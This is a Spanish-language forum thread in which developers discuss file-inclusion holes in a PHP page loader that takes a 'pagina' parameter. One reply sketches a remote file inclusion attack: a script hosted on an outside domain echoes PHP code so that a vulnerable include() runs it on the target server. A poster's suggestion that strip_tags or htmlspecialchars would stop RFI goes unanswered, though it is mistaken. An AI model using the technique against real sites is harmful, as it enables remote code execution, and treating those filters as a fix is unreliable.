Cita:
Iniciado por david_M_G 
Yo he encontrado otra vulnerabilidad, y es la de poder incluir la misma página que se está cargando
Ejemplo:
index.php?pagina=index
Esto lleva a un bucle infinito de inclusión, que suele acabar en que el navegador muestra un diálogo de descarga de "index.php" al usuario. (Si lo descarga, no verá las líneas de PHP, claro está), aunque también puede acabar en múltiples mensajes de error.
No lo tenía en cuenta, gracias
Me parece que filtrando algunos caracteres (alguna funcion tipo strip_tags o htmlspecialchars como me decían más arriba) se solucionaría el problema de RFI... no?
Cita: Manu_leon, sí se ejecuta el codigo script, ejemplo:
si script.php es esto:
Código PHP:
<?php
echo "<?php ...aqui el codigo que se ejecutara en el servidor destino.. ?>";
?>
Como veras, Manu_leon, la salida html de este script, es un script en php. Con lo que se ejecutara en el servidor que hace include("http://www.midominio.com/script.php").
Hay otra forma, si script.php está en un servidor que no interpreta php lo enviaría como si fuera un .html, no?
gracias por todas las sugerencias